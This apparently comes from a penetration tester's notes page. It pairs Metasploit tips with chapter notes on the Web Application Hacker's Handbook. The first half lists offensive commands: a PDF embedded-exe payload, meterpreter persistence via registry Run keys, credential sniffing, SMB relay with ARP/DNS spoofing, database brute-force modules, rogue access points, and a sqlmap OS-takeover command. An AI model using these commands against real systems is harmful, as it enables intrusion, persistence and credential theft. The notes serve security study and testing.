Inject payload into a PDF mdf>use windows/fileformat/adobe_pdf_embedded_exe; Requires user interaction

Social Engineering Toolkit(SET) will automate creation of website & email phishing attacks

"Shell is only the beginning" -Dark0perator

HACKING file in framework directory will provide guildines for writting your own exploits. Put in ~/.msf3/modules

Persistence meterpreter>run persistence -r -A -X; Creates a VBS in TEMP and a Run key in registry

"Chunky Bacon" meterpreter> irb will inherit all your ruby methods: client.fs.dir.methods, client.fs.file.methods, client.sys.process.methods, etc
>> client.sys.process.execute("ipconfig", nil, {'Hidden' => true, 'Channelized' => true}); nil is the path to the command

auxiliary/psnuffle will act as a sniffer and also extract credentials for URLs, IMAP, ftp, and pop3

Spoofing attack with SMB Realy
# dnsspoof -f ./OurDNSFile.txt ; # arpspoof -i -t
msf> use exploit/windows/smb/smb_relay

Enumerating Oracle SID - oracle/xdb_sid, emc_sid, spy_sid, sid_enum
P0wning Oracle - oracle/login_brute, ora_ntlm_stealer, admin/oracle/sql
MSSQL - mssql/mssql/mssql_exec, mssql_login, mssql_sql
MySQL - admin/mysql/mysql_enum, mysql_sql, scanner/mysql/mysql_login, mysql_version

Karmetasploit is fakeap piped into Metasploit. Easier to configure with kmsapng.sh from Dark0perator. Best to modify the script to not run every exploit

though. # ./kmsapng.sh -m km -i wlan0; km=airbase-ng drivers kma=atherosmad-wifi drivers. -f options adds filtering

Chaka Kahn by J Wright beacons the top SSIDSs from wigle.net. Newer wireless clients will not probe for an AP unless they see a beacon first. Add

corporate SSIDs to your ssid list and hangout at the closest coffee shop.

Metasploit has DECT functions - dect/call_scanner, dect/station_scanner, requires a DECT card. Buy from German ebay.

Web Assessment
scanner/http/http_version - finds web server versions
scanner/http/robots_txt - pulls info from robots.txt
scanner/http/writable - finds any writable directories
auxiliary/http_index_grabber - performs HTTP Gets on /

Wmap integrates many of these commands msf>load db_wmap
wmap_attack - crawl and attack
wmap_crawl - crawl only, supports authentication and proxy
wmap_targets - manage targets
wmap_sql - only sql statements against internal wmap db
wmap_website - allows you to see structure of target website
wmap_proxy - alternative to ratproxy or burp

http://www.offensive-security.com/metasploit-unleashed/wmap-web-scanner
http://www.metasploit.com/redmine/projects/framework/wiki/WMAP

SQLMap will leverage an SQL injection to provide a metasploit payload
# ./sqlmap.pay --msf-path=/home/tools/msf3/ --url="http:///inscecure.php" --method=POST --data="name=bob&submit=Search" -p name --os-pwn
Must provide document root, Supports encoding of payload

Lab Notes - Get a Technet subsciptions $350, Win2K most stable victim box, copy of McAfee and Symantec

Resources

GPWN mailing list
CmdLine Kung Fu - http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html
Pentesting Perfect Storm Series
http://www.willhackforsushi.com/?page_id=137
http://www.coresecurity.com/content/penetration-testing-webcasts
Linn's XMLRPC - https://www.defcon.org/images/defcon-18/dc-18-presentations/Linn/DEFCON-18-Linn-Multiplayer-Metasploit.pdf
Why's Ruby Guide - http://mislav.uniqpath.com/poignant-guide/
HD on IPv6 Hacking - http://www.uninformed.org/?v=10&a=3
Fast Cracking - http://hashcat.net/oclhashcat/



Web Application Hacker's Handbook - Notes

1 - Web Application (In)security

Massive false sense of security in SSL. Most websites are insecure in ways that have nothing to do with encryption in transit.

Core Problem: Uses Can Submit Arbitrary Input -> Users can tamper with any data sent to the server, can input in any sequence, and are not restricted to using a browser.

Companies using public web applications have reduced their perimeter control by exposing back end internal systems to web applications that are located in a publicly accessible DMZ.

2 - Core Defense Mechanisms

User Access - Authentication, Session Management, & Access Control

Input Handling - Reject Known Bad, Accept Known Good, Sanitization, Safe Data Handling, & Semantic Checks

Boundary Validation - treat data as untrusted at multiple stages of the processing across systems

Multistage Validation and Canonicalization where user input is manipulate over several stages
examples - <scr<script>ipt> or <scr"ipt> and %%2727

Handling Attackers - Handling Errors, Maintaining Audit Logs, Alerting Admins, Reacting to attacks

Error Handling - never return any system messages or debug information. Applications should use try/catch blocks and checked exceptions.

Logs not only need to be protected from erasure by the attacker but also from read access as they often contain sensitive information

3 - Web Application Technologies

TRACE http method can be used to test for proxy servers. It should return the exact contents of the request it received.

When https is routed through a proxy it becomes a pure TCP-level relay to the dest web server using the CONNECT method.

Enterprise Java Bean(EJB) is a complex software component that encapsulates a specific business function for the application.

Plain Old Java Object(POJO) is user-defined and simpler then an EJB.

Java Servlet(JSP) reside on the application server to handle http requests and responses.

Java Web Container is a platform or engine that provides a run time environment for java web apps. (Tomcat, WebLogic, JBoss)

Common 3rd party components: JAAS, ACEGI for auth, SiteMesh, Tapestry for presentation, Hibernate for DB object mapping, and Log4J for logging

Always URL encode [space, %, ?, &, =, ;, +, #] when used as data. Not needed when used as parameters.

4 - Mapping the Application

Enumerate Content & Functionality: Site Map, robots.txt, Spidering

User Controlled Spidering is preferred over automated in order to handle auth session problems, dynamic content, and admin functions.

Content can often include backup files and archives, old and dev code, configuration and source files, and log files.

Before bruteforcing for common directories and files, make manual requests to see how the server handles valid and invalid requests.

Identify the naming scheme if applicable ( AnnualReport2009.pdf -> AnnualReport2010.pdf)

Key areas to investigate:
Core Functions of the App
Peripheral behavior like links, errors, logging, redirects, etc
Security mechanisms like session state, access controls, authorization controls, user registration, password changes and account recovery
All user supplied input locations
Any file upload/download functions
Client-side technology like forms, javascript, java applets, ActiveX, Flash, and cookies
Server-side technology like web server instance, request parameters, use of SSL, db interactions, and other back-end components

Httprint can fingerprint a server even with a disguised banner

Request a non-existent .aspx file to immediately find out if ASP is being used

Common directories:
servlet - Java
pls - Oracle
cfdocs/cfide - ColdFusion
WebObjects/.woa - Apple WebObjects
rails - Ruby on Rails

Common session tokens:
JSESSIONID - Java
ASPSESSIONID - IIS
ASP.NET_SessionId - ASP.NET
CFID/CFTOKEN - ColdFusion
PHPSESSID - PHP

5 - Bypassing Client-Side Controls

6 - Attacking Authentication

7 - Attacking Session Management

8 - Attacking Access Controls

9 - Injecting Code

10 - Exploiting Path Traversal

11 - Attacking Application Logic

12 - Attacking Other Users

13 - Automating Bespoke Attacks

14 - Exploiting Information Disclosure

15 - Attacking Compiled Applications

16 - Attacking Application Architecture

17 - Attacking the Web Server

18 - Finding Vulnerabilities in Source Code

19 - Web Application Hacker's Toolkit

20 - Web Application Hacker's Methodology 

Reference:
https://cyberguardians.blogspot.com/p/pen-testing.html